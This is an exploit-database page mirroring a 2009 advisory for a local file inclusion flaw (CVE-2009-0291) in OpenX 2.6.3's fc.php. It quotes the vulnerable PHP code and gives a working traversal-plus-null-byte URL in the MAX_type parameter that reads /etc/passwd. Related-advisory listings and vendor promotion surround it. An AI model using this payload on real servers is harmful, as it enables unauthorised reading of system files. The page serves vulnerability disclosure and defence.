Lucene search
+L

OpenX 2.6.3 - 'MAX_type' Local File Inclusion

🗓️ 26 Jan 2009 00:00:00Reported by Charlie BriggsType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

OpenX 2.6.3 'MAX_type' Local File Inclusion vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0291
26 Jan 200900:00
circl
cve
CVE
CVE-2009-0291
27 Jan 200920:00
cve
cvelist
Cvelist
CVE-2009-0291
27 Jan 200920:00
cvelist
dsquare
Dsquare
OpenX 2.6.3 LFI
27 Apr 201200:00
dsquare
exploitdb
Exploit DB
OpenX 2.6.2 - 'MAX_type' Local File Inclusion
26 Jan 200900:00
exploitdb
euvd
EUVD
EUVD-2009-0296
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0291
27 Jan 200920:30
nvd
nessus
Tenable Nessus
OpenX fc.php MAX_type Parameter Traversal Local File Inclusion
30 Jan 200900:00
nessus
prion
Prion
Directory traversal
27 Jan 200920:30
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
1 Feb 200900:00
securityvulns
Rows per page
<snip>
include_once '../../init-delivery.php';
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
exit(1);
}
$tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME];
$tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php';
if(!file_exists($tagFileName)) {
echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists';
exit(1);
}
include $tagFileName;
</snip>

If a null byte is appended to the end of a string, and directory traversal is used in the GET parameter MAX_type,
like so: /www/delivery/fc.php?MAX_type= ../../../../../../../../../../../../../../../etc/passwd%00, you will see
the /etc/passwd file before you ;)

-Charlie Briggs [Elites0ft.com]

# milw0rm.com [2009-01-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07037
31